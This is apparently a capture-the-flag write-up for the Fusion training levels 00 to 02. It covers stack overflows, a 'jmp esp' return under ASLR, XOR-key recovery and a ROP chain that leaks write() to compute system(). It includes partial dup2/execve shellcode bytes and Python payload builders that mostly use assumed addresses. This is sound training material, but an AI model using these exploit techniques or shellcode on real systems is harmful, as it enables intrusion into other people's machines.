Fusion Level02
- The service XORs traffic with a random key, so the first step is recovering the XOR table.
- After that it is just ROP: leak the address of write() and compute system() from the libc offset.
- I just used system(). There is another way to get a shell, execve(); using execve() would be cleaner and more comfortable when building the payload.
...
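The two steps above (recover the XOR table, then leak write() and derive system()) as an added example; this is not the write-up's own exploit and it deliberately avoids pwntools so it runs offline. The key length, the socket fd, every address in the ROP chain and the libc symbol offsets are assumed values for illustration, not the level's real ones.

```python
import os
import struct

# Assumption for this example: the service applies a 128-byte random XOR table
# to what we send.  The real length must be read from the level's source.
KEY_LEN = 128


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key (the level's 'encryption')."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext gives the key stream.
    Sending all-zero bytes makes the echoed ciphertext the key itself."""
    if len(ciphertext) < len(known_plaintext):
        raise ValueError("need at least as much ciphertext as known plaintext")
    return xor_bytes(ciphertext[: len(known_plaintext)], known_plaintext)


def encrypt_payload(payload: bytes, key: bytes) -> bytes:
    """Pre-XOR the payload so the service's own XOR turns it back into our bytes."""
    return xor_bytes(payload, key)


def build_rop_leak(write_plt: int, pop3_ret: int, fd: int, write_got: int) -> bytes:
    """32-bit chain: write(fd, &write@got, 4) leaks the resolved libc address.
    pop3_ret cleans the three arguments off the stack after the call."""
    return struct.pack("<IIIII", write_plt, pop3_ret, fd, write_got, 4)


def system_from_write_leak(write_leak: int, write_off: int, system_off: int) -> int:
    """libc base = leaked write() - offset(write); system() = base + offset(system).
    The offsets come from the target's libc (e.g. readelf -s), not from ours."""
    libc_base = write_leak - write_off
    return libc_base + system_off


def demo() -> bool:
    """Simulate one connection: random table, zero probe, key recovery, and a
    chain encrypted so that it decrypts to exactly what we intended."""
    key = os.urandom(KEY_LEN)                  # what the service would generate
    probe = b"\x00" * KEY_LEN                  # known plaintext we send
    echoed = xor_bytes(probe, key)             # what the service sends back
    recovered = recover_key(echoed, probe)
    # Hypothetical addresses: write@plt, pop-pop-pop-ret, client socket fd, write@got.
    chain = build_rop_leak(0x08048A0C, 0x08049B8D, 0, 0x0804B3E4)
    wire = encrypt_payload(chain, recovered)   # bytes actually sent
    return xor_bytes(wire, key) == chain and recovered == key
```

The leak chain only needs the resolved address of one libc function; once `system_from_write_leak()` gives the base, any other symbol (execve(), a "/bin/sh" string) is the same base plus its own offset.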
Fusion Level01
- NX is still disabled, but ASLR is on.
- Now we can't get the buffer address from the binary.
- All you need is a 'jmp esp' gadget.

from pwn import *

# dup2(sockfd, 0) + dup2(sockfd, 1) + dup2(sockfd, 2) + execve /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x..
Fusion Level00
- There aren't any memory protections, not even NX, so I just use shellcode.
- The service is on port 20000. Be careful with the 'fd': the shell's stdin/stdout/stderr must be the socket, so the shellcode dup2()s the socket fd onto 0, 1 and 2.
- In fix_path() there is a stack buffer overflow.
- The saved return address is at bytes 140 to 143 of the buffer.

from pwn import *

# dup2(sockfd, 0) + dup2(sockfd, 1) + dup2(sockfd, 2) + execve /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\..
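The payload layouts for Level00 (no ASLR: return into the buffer) and Level01 (ASLR on: return to a 'jmp esp' gadget) as one added example, not the write-up's own code. It reuses the page's offset of 140 for the saved EIP; the buffer address, the gadget address, the stand-in shellcode and the set of bad bytes are assumptions for illustration.

```python
import struct

# From the write-up: the saved return address of fix_path() is at bytes 140..143.
RET_OFFSET = 140

# Constructed stand-in for the page's dup2/execve shellcode (four int3 bytes).
# It keeps the block runnable offline; it is not a working shell.
STUB_SHELLCODE = b"\xcc" * 4


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian dword (same as pwntools' p32)."""
    return struct.pack("<I", value)


def level00_payload(buf_addr: int, shellcode: bytes = STUB_SHELLCODE,
                    offset: int = RET_OFFSET) -> bytes:
    """No ASLR, no NX: shellcode at the start of the buffer, padding up to the
    saved EIP, then the buffer's fixed address so `ret` lands on the shellcode."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the saved return address")
    padding = b"A" * (offset - len(shellcode))
    return shellcode + padding + p32(buf_addr)


def level01_payload(jmp_esp: int, shellcode: bytes = STUB_SHELLCODE,
                    offset: int = RET_OFFSET) -> bytes:
    """ASLR on, NX off: the stack address is unknown, but after `ret` pops the
    saved EIP, ESP points at the very next dword.  Overwrite EIP with a
    `jmp esp` gadget (fixed address in the non-PIE binary) and put the
    shellcode right behind it, so execution reaches our bytes wherever the
    stack happens to be."""
    return b"A" * offset + p32(jmp_esp) + shellcode


def saved_eip(payload: bytes, offset: int = RET_OFFSET) -> int:
    """Read back the dword that overwrites the saved EIP: a sanity check."""
    return struct.unpack("<I", payload[offset:offset + 4])[0]


def has_bad_bytes(payload: bytes, bad: bytes = b"\x00\n") -> bool:
    """Assumed bad bytes for the example: a NUL or newline would cut a string
    copy short.  Check the finished payload before sending it."""
    return any(b in payload for b in bad)
```

The assumed 'jmp esp' address (0x08049f4f style) has no NUL byte, which is why it can sit in the middle of the payload; a gadget such as 0x08040000 would fail `has_bad_bytes()` and needs a different gadget.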